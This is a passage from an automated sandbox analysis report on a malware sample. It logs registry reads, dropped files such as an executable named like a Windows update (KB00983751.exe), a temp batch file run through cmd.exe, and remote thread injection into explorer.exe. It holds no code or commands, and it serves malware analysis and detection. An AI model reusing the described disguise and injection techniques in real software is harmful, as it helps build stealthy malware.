Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ AuthenticodeEnabled ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ AppData ], Value: [ %USERPROFILE%\Application Data ], 1 time
[=============================================================================]
2.b) bc9deebcb0.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp ]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\Apphelp.dll ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\SHELL32.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\cmd.exe ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
File Name: [ C:\bc9deebcb0.exe ]
[=============================================================================]
2.c) bc9deebcb0.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Processes Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ], Command Line: [ ]
Executable: [ C:\WINDOWS\system32\cmd.exe ], Command Line: [ ]
Executable: [ ], Command Line: [ "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT" ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Affected Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\Documents and Settings\Administrator\Application Data\KB00983751.exe ]
Process: [ C:\WINDOWS\system32\cmd.exe ]
[#############################################################################]
3. KB00983751.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: KB00983751.exe
MD5: 7650a8aa7d4f891982f0ca24a24e9c0c
SHA-1: b3a32d512c1e28a269e7947da4807cd39bbb6ef3
File Size: 73216 Bytes
Command Line: "C:\Documents and Settings\Administrator\Application Data\KB00983751.exe"
Process-status
at analysis end: dead
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.DLL ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\MSVCRT.DLL ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\PSAPI.DLL ],
Base Address: [0x76BF0000 ], Size: [0x0000B000 ]
Module Name: [ C:\WINDOWS\system32\SECUR32.DLL ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\TAPI32.DLL ],
Base Address: [0x76EB0000 ], Size: [0x0002F000 ]
Module Name: [ C:\WINDOWS\system32\rtutils.dll ],
Base Address: [0x76E80000 ], Size: [0x0000E000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
[=============================================================================]
Run-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
[=============================================================================]
SigBuster Output
[=============================================================================]
UPX All_Versions SN:1634
[=============================================================================]
3.a) KB00983751.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SOFTWARE\CLASSES\HTTP ],
Value Name: [ Source Filter ], Value: [ {E436EBB6-524F-11CE-9F53-0020AF0BA770} ], 2 times
Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ],
Value Name: [ CUAS ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ],
Value Name: [ TSUserEnabled ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Language Hotkey ], Value: [ 1 ], 2 times
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Keyboard Layout\Toggle ],
Value Name: [ Layout Hotkey ], Value: [ 2 ], 2 times
[=============================================================================]
3.b) KB00983751.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 7 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSCTF.dll ]
File Name: [ C:\WINDOWS\system32\MSIMG32.DLL ]
File Name: [ C:\WINDOWS\system32\PSAPI.DLL ]
File Name: [ C:\WINDOWS\system32\TAPI32.DLL ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\imm32.dll ]
File Name: [ C:\WINDOWS\system32\rtutils.dll ]
[=============================================================================]
3.c) KB00983751.exe - Process Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Remote Threads Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Affected Process: [ C:\WINDOWS\explorer.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Foreign Memory Regions Written:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Process: [ C:\WINDOWS\explorer.exe ]
[#############################################################################]
4. cmd.exe
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: Started by bc9deebcb0.exe
Filename: cmd.exe
MD5: 6d778e0f95447e6546553eeea709d03c
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
File Size: 389120 Bytes
Command Line: "C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT"
Process-status
at analysis end: dead
Exit Code: 1
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
[=============================================================================]
4.a) cmd.exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ],
Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time
Key: [ HKLM\SYSTEM\Setup ],
Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time
Key: [ HKLM\SYSTEM\WPA\MediaCenter ],
Value Name: [ Installed ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000204000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.iac2 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000001100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.imaadpcm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000550000001e000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000000200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msadpcm ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000120000006001000016000000610100001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msaudio1 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ aFormatTagCache ], Value: [ 0x010000001000000006000000120000000700000012000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000420000001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003001000016000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
